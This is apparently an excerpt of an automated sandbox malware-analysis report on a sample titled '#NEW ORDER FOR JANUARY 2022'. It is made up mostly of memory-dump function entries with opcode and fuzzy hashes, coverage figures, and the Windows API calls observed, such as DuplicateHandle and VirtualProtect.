                                • Instruction ID: 5c7b31975bf6307546c4fd97343ce6cd0a22374ec48244ba48d3c1006fd7573b
                                • Opcode Fuzzy Hash: 0e7619e2bd06b56766d3455786e7ec9f64e102c34f43c704cdb9712e79041fa6
                                • Instruction Fuzzy Hash: A7E08631340620AFC7109B79E909B65BBED9F8C621F1480A9FA4ACB3E1EA659C41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11161ad514610df1228cb62c4fa280fff2cf7c1facce59beacace473fe7fc9ea
                                • Instruction ID: dc301c744e0d4610f2dbc124698eeb03cdbbe1cf2b67c810f485f22929d654c8
                                • Opcode Fuzzy Hash: 11161ad514610df1228cb62c4fa280fff2cf7c1facce59beacace473fe7fc9ea
                                • Instruction Fuzzy Hash: B6E04F343487849FC7468B78E8559253BB9EB4A66431551EAEC09CF3A2CA36EC41CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26291fe94d2c69fe7ec863cc812278ba54218d4a559c5bc0cb41305a3e5b055a
                                • Instruction ID: 18c7c78141927ca05ff7404597c17ecfe75c5f780c8cf83ac342b1a8006d951d
                                • Opcode Fuzzy Hash: 26291fe94d2c69fe7ec863cc812278ba54218d4a559c5bc0cb41305a3e5b055a
                                • Instruction Fuzzy Hash: BAE06D70D4024D9FCB14CFA4C941EAEBBB1AF40204F608459C801EB715C7745D06CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbc0c55db7379b4dcb9af990d89d02535846e1784f9e839bc818dbd92f3cfa6e
                                • Instruction ID: 3337aa0e2a58d1c21f24f9ee5d3c794041a641eb740eebbfab8b37ecc845db88
                                • Opcode Fuzzy Hash: cbc0c55db7379b4dcb9af990d89d02535846e1784f9e839bc818dbd92f3cfa6e
                                • Instruction Fuzzy Hash: 76E04F70A0534DDFCB91DF68EA451EDBBB8FB86308F1045EED808D7251D6351E09AB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a21e173969a94a38e1460258799a642d8843adb56dafffa1552e83113243d330
                                • Instruction ID: ff578694c192fd01e6e0e56f23148f611eae1f64ad9378e770eddbbb1bb274e0
                                • Opcode Fuzzy Hash: a21e173969a94a38e1460258799a642d8843adb56dafffa1552e83113243d330
                                • Instruction Fuzzy Hash: 43E0B674E0420CAFCB44EFB8E44959DBBF5AF48218F0185E9A909E7350EF746E448F81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6bd4a3112e4abdcf67f3837b149803d6cd5455861b6d96aedf4e1363a29fbf0
                                • Instruction ID: 6c6c7181689f57853b285a421085effaaa9045212ee2775f2c3ff75ae970da71
                                • Opcode Fuzzy Hash: d6bd4a3112e4abdcf67f3837b149803d6cd5455861b6d96aedf4e1363a29fbf0
                                • Instruction Fuzzy Hash: 0BD05E70A0120DEFCB80EFA8EA0149DB7FDEB85208B1044ECD80DE3300EA316F049B80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b413a89fbbdfbbc259ee80f7d329a10155a7c40fce74cfee8c4e082f3927eb2
                                • Instruction ID: fd607f5dc946d9eb2dfe51813de0a0d22311ca5893586f0e3a5a5469ad9ac387
                                • Opcode Fuzzy Hash: 8b413a89fbbdfbbc259ee80f7d329a10155a7c40fce74cfee8c4e082f3927eb2
                                • Instruction Fuzzy Hash: B2D0A9327002208F8708EBACF408858B3EEAF8912431040EAE40ACB371DE20EC408BD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 650c80ba5ac71b43da1d53c8e9a3e820b876a4d8987dec199bd3fc48a6cba0b4
                                • Instruction ID: fa5a3cba5f985df31e1b5cee486d882fef38b834cfb3c7322281648a3c9e7987
                                • Opcode Fuzzy Hash: 650c80ba5ac71b43da1d53c8e9a3e820b876a4d8987dec199bd3fc48a6cba0b4
                                • Instruction Fuzzy Hash: 00D0A7343403448FC744DB6CF04892573BEEB8C6203105099ED09CB365CE31EC408F61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31fde10b6a319c0bc816edd46cf9790f8caf3404aef029df8d2b2590f26acea5
                                • Instruction ID: 360bbe38f05c8dec9cc2855c418678ae5ba5e370d07cfa36a311127bf40db1ad
                                • Opcode Fuzzy Hash: 31fde10b6a319c0bc816edd46cf9790f8caf3404aef029df8d2b2590f26acea5
                                • Instruction Fuzzy Hash: E3D0A9300083488FC7022B70A81C2683BB9EA82720B4000FAE4048B022F6B90880CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43b52df32746126167e9a691690ea1414df0adc5f79f25da014dfe3f51639601
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 43b52df32746126167e9a691690ea1414df0adc5f79f25da014dfe3f51639601
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef3a278abdda990c12ae330beb7d35a91a7e34579e7b5a77309ca2b9d0180c51
                                • Instruction ID: 3253784eb692652349c4b8ab08b03383ad6853cc6c4a5deac21c71ab622cd1ae
                                • Opcode Fuzzy Hash: ef3a278abdda990c12ae330beb7d35a91a7e34579e7b5a77309ca2b9d0180c51
                                • Instruction Fuzzy Hash: FBB0123000470D8F8680BFA4F40BC043B2C9640A2CBC08950E10CC54359E7828C5C78C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6a82a2c2fe3755c80026424e7babf4f5c3ac46372711aab266463c8d577a59b
                                • Instruction ID: 1004a859cff2bc75d39050e09d983c9fa26610baa4b8efa95ca3043267a744b5
                                • Opcode Fuzzy Hash: d6a82a2c2fe3755c80026424e7babf4f5c3ac46372711aab266463c8d577a59b
                                • Instruction Fuzzy Hash: 58B0123054030C8BCA1137B0709C21CB7DC9B44711F800013A40E82205DEB654804740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 247994df99789a7397dcc5b6ad127842fc66c1280e51bd5ad68a313250301f7c
                                • Instruction ID: 1e014c4de74614c6189226666da45aa36d6f42bf6c7995d8868e985e9138abc5
                                • Opcode Fuzzy Hash: 247994df99789a7397dcc5b6ad127842fc66c1280e51bd5ad68a313250301f7c
                                • Instruction Fuzzy Hash: 79B0123020470D4B8640ABA4F44A85C3B1C99405187A0C550A20C854196E782844878C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b4931e7fab06b7eb9945d54fb6d9dcdae0a105d36f5d49d6653023f021bcdba
                                • Instruction ID: a1bb9d4b4c00c0146831cd856c51ccbb5d147a46656d09eec16200b0700ea42c
                                • Opcode Fuzzy Hash: 2b4931e7fab06b7eb9945d54fb6d9dcdae0a105d36f5d49d6653023f021bcdba
                                • Instruction Fuzzy Hash: B6622AB06006049BD748EF19D49871A7AE6FB9430CF64C56CC10A9F392DBBBD90B9B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34793a44382de8d9cc14633e683e31211e5b984c652409ae0a95406fbb7d99e6
                                • Instruction ID: 61bbb9e493413b1934565cf008c411c0c5c18ba23a7efe6ed536d6b571369866
                                • Opcode Fuzzy Hash: 34793a44382de8d9cc14633e683e31211e5b984c652409ae0a95406fbb7d99e6
                                • Instruction Fuzzy Hash: 25621AB06006049BD748EF19D49871A7AE6FB9430CF64C56CC10A9F392DFBBD90B9B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd3a28abf541dac9b956cfee06e34f9123e2ece589ee3905b2771a05e38743de
                                • Instruction ID: d20a9ff53eaf64b35b13f3aae45c6ec7b95d73fdb3aa6c30dc4cc60a000a6944
                                • Opcode Fuzzy Hash: bd3a28abf541dac9b956cfee06e34f9123e2ece589ee3905b2771a05e38743de
                                • Instruction Fuzzy Hash: 7E12BE30A042099FCB15DF68D884AAEBBF6FF84314F558569ED45EB261DB30EC46CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 901d4ec02da68f07260b6190d67c0590e8c8ffc39e74057c8236b5bf31ec96c3
                                • Instruction ID: 91e789348276eb3fa5ae58b262bb6cf82fc3d1796545d62301f0c4398dd436ec
                                • Opcode Fuzzy Hash: 901d4ec02da68f07260b6190d67c0590e8c8ffc39e74057c8236b5bf31ec96c3
                                • Instruction Fuzzy Hash: 10B14B36F512259BCB08CEB8DC922AA75E79BCC7207169136E806EF354DE35DD4287C2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1be4057c8619b19864b7cd5a7aee78b8848c974c45c585b4c0a7930fb6ef5ad
                                • Instruction ID: fb389c1b64cbe722f157fa9737d25c3b46d92ac23ea8034690722b67fb735d0d
                                • Opcode Fuzzy Hash: c1be4057c8619b19864b7cd5a7aee78b8848c974c45c585b4c0a7930fb6ef5ad
                                • Instruction Fuzzy Hash: 25B12936F512359BCB08CAB9DC522AA75E79BCC7207169136E806EF354DE39DC0287C2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bd7fbbb941ac7df7310e12784bf76b8dfffed9663045fa33c7c9517127ad9a6
                                • Instruction ID: 521f909593300e45af908d3fa996966672755fb1aa9fc88f7779e772beefab05
                                • Opcode Fuzzy Hash: 8bd7fbbb941ac7df7310e12784bf76b8dfffed9663045fa33c7c9517127ad9a6
                                • Instruction Fuzzy Hash: 91A19C36E00219CFCF09DFA5C8446DEBBB2FF88311B15817AE805BB221EB35A955CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56a995ead3b576dc892a9bb0f21c0514d3ff85afa501e0919ebbd81b066cfa05
                                • Instruction ID: 51f4516d9b3560cc6d2db732c406cec6b73ada57719cb7d27ac9e52ff3cf5ff5
                                • Opcode Fuzzy Hash: 56a995ead3b576dc892a9bb0f21c0514d3ff85afa501e0919ebbd81b066cfa05
                                • Instruction Fuzzy Hash: B471DF75B501098BDF08CBA8DD566EDB6F2AFC8321F248166D406EB384EB3DDD028B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d7dfbff7058f751d43a07f11d465303c82cff87d1dcf252b927c4575e9a0f5f
                                • Instruction ID: 6f7c945a06e110d6d88e20cae525178fc37bd6b51a54dfc67b2ae015937fc7b4
                                • Opcode Fuzzy Hash: 2d7dfbff7058f751d43a07f11d465303c82cff87d1dcf252b927c4575e9a0f5f
                                • Instruction Fuzzy Hash: 5361E476B5010A8BDF04CBB9D9522EDB6F3AFC8360B299166D806FB354DB39DD028750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6f4d05c7b8932147e06801270227d42ae007129189400f54de8367e063a1ba5
                                • Instruction ID: ade23563134c91a5e8c8033db2e7886bb6f1688961923e0082992bd4d001f17b
                                • Opcode Fuzzy Hash: d6f4d05c7b8932147e06801270227d42ae007129189400f54de8367e063a1ba5
                                • Instruction Fuzzy Hash: 6A516772F402258BDB08DAB8DC562AE75A36FD4210B1A5539EC06FF384EE7CDC164790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cefacbca6ab511a63ba411f15c8267a6bcfa456b08ec5bc4b1ce8d67315b912e
                                • Instruction ID: 30568929bffdeb2668de78cf280648270a4abe93299a6c073959152e4990cd34
                                • Opcode Fuzzy Hash: cefacbca6ab511a63ba411f15c8267a6bcfa456b08ec5bc4b1ce8d67315b912e
                                • Instruction Fuzzy Hash: 09413776F402218BDB08DA79CD552AE65E36FD861071A5439AC07EF388EE7CDC128790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Execution Graph

                                Execution Coverage:12.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:81
                                Total number of Limit Nodes:6


                                Executed Functions

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01886B60
                                • GetCurrentThread.KERNEL32 ref: 01886B9D
                                • GetCurrentProcess.KERNEL32 ref: 01886BDA
                                • GetCurrentThreadId.KERNEL32 ref: 01886C33
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: dccde92d88fafad6aa49b0091430350fa100bcdc33682dd79c1fbc4c10f5dd01
                                • Instruction ID: 420c69ea11628faf5182b069d911cac5ea0ec28dd0a32763dc7edf3173ffb42d
                                • Opcode Fuzzy Hash: dccde92d88fafad6aa49b0091430350fa100bcdc33682dd79c1fbc4c10f5dd01
                                • Instruction Fuzzy Hash: 5B5152B09106498FDB54DFAAD548B9EBBF0FF88318F20845DE119A3350DB74A988CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01885362
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e15658831c4b87fd696ca80a29ffa85a631ab439a7ecdb3bd10e962de393c85d
                                • Instruction ID: fe5dde74f2b287edf40beb5efd56aed8a615ba50df2dd05786ec8fdc2b4e4b2a
                                • Opcode Fuzzy Hash: e15658831c4b87fd696ca80a29ffa85a631ab439a7ecdb3bd10e962de393c85d
                                • Instruction Fuzzy Hash: 8B51C0B1D00309DFDF14CFAAD884ADEBBB5BF48354F24812AE819AB250D7749945CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01885362
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: dbdb7dc4b9427621509069c1bf2fc328e6c6d729e8c5d0e1d9703a71fcca45c0
                                • Instruction ID: ec57a219f8f7f007ef8d61388390f7770911ec776d9f46d16032d1823701b7e4
                                • Opcode Fuzzy Hash: dbdb7dc4b9427621509069c1bf2fc328e6c6d729e8c5d0e1d9703a71fcca45c0
                                • Instruction Fuzzy Hash: B341B0B1D003099FDB14DF9AC884ADEBBB5BF48314F24812AE819AB210D7749945CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 01887CB1
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: ce653b98e84278a79dfcf0bde01e51ba2e2b749ae1084a71e98a9b48d29d926d
                                • Instruction ID: bb56c8f4467367c872cc6298732d24f1e4042cb9389124f5ef2733b65ae1d85e
                                • Opcode Fuzzy Hash: ce653b98e84278a79dfcf0bde01e51ba2e2b749ae1084a71e98a9b48d29d926d
                                • Instruction Fuzzy Hash: 3E416AB4A00709CFDB14DF99C488AAABBF6FF88314F25C459E519A7321C734A941CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01886DAF
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 1cff90121035f63702f204b59e177916d2212540daec18a104baa6b675a328ea
                                • Instruction ID: 9366aa35d58507b702cc7edd743aea46177794fb8f7897bc6390306baea81318
                                • Opcode Fuzzy Hash: 1cff90121035f63702f204b59e177916d2212540daec18a104baa6b675a328ea
                                • Instruction Fuzzy Hash: 0621E5B59002089FDB10CFA9D984ADEBBF4FF48314F24851AE914A7310D774A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01886DAF
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 8e524d82ecae6db4fa7fcc1f380688c0ebba379b1a5e8d476c6898c713641120
                                • Instruction ID: cd98ddc44b401f73eabd001ceff85146df67325d7eb22db9e4f091b681438c2d
                                • Opcode Fuzzy Hash: 8e524d82ecae6db4fa7fcc1f380688c0ebba379b1a5e8d476c6898c713641120
                                • Instruction Fuzzy Hash: D421D5B59002089FDB10CFAAD884ADEBBF4FB48324F14841AE914A3350D775A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 8 basic blocks, 188c198-188c26e. From 188c1f5-188c200 one path skips straight to the exit block 188c261-188c26e; the other enters 188c202-188c233, calls RtlEncodePointer, and rejoins the exit via 188c23c-188c25c.
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 0188C222
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 55dfa51cc82fc37e15325b8f871d01ab99355723566e53b51cbe7fc0222360ea
                                • Instruction ID: f07fcddea51af49e4045216a735fb0a28a63d279dffef2ad19890a2a487e8d72
                                • Opcode Fuzzy Hash: 55dfa51cc82fc37e15325b8f871d01ab99355723566e53b51cbe7fc0222360ea
                                • Instruction Fuzzy Hash: A22197719117098FDB50EFA9E8483DABFF4EB44725F24842AD408F3641CB39A649CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 8 basic blocks, 188c1a8-188c26e: the same blocks as the 188c198 function above, entered at 188c1a8. RtlEncodePointer is called in 188c202-188c233, reached from 188c1f5-188c200 and rejoining the exit block 188c261-188c26e via 188c23c-188c25c.
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 0188C222
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 448f2e62c139713707eda5607f0c21f01aa2e7c4346664bc968f5cfab0e464c7
                                • Instruction ID: c09d6bf8d3449d4411910d1c1adf7e9a2447c3a534c9ccc451ef7dacd5507526
                                • Opcode Fuzzy Hash: 448f2e62c139713707eda5607f0c21f01aa2e7c4346664bc968f5cfab0e464c7
                                • Instruction Fuzzy Hash: EA1189709017098FDB50EFA9E8487DEBBF4FB45725F20802AD408E3645C739A549CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000001F.00000002.754852530.00000000017DD000.00000040.00000001.sdmp, Offset: 017DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_17dd000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b7a10f69bdf47ce75f479a3269520b02576e75821688baf84926bf3d0ee6faf
                                • Instruction ID: a42efa39c988c97e2b6f2e9bce582335985a523f2a02d68fcfa3e741832ced55
                                • Opcode Fuzzy Hash: 7b7a10f69bdf47ce75f479a3269520b02576e75821688baf84926bf3d0ee6faf
                                • Instruction Fuzzy Hash: D4210371504248DFCB21DF64D9C4B16FB75EB88254F24C9ADD9094B286C336D807CA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000001F.00000002.754852530.00000000017DD000.00000040.00000001.sdmp, Offset: 017DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_17dd000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fb0d048d15e7ab53127858e8fc149506558ba3ec195f16904898375b55d41c1
                                • Instruction ID: 514e60081210c605baee537935e9259386b9429935fde70c936af3e85d61974c
                                • Opcode Fuzzy Hash: 2fb0d048d15e7ab53127858e8fc149506558ba3ec195f16904898375b55d41c1
                                • Instruction Fuzzy Hash: E82183754083849FCB12CF24D994711FF71EB86214F28C5DAD8498B697C33AD846CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Execution Graph

                                Execution Coverage:11%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:262
                                Total number of Limit Nodes:14

                                Graph

                                Rendered execution graph image not reproduced; the raw edge list is summarised below as entry points and the Windows APIs they reach (addresses are the graph's node labels).
                                • 78e0448 -> 78e044b -> 78e009c -> DuplicateHandle (78e04b0)
                                • 78ee998 -> 78ee9d8 / 78ee9d1 -> VirtualProtect (78eea20)
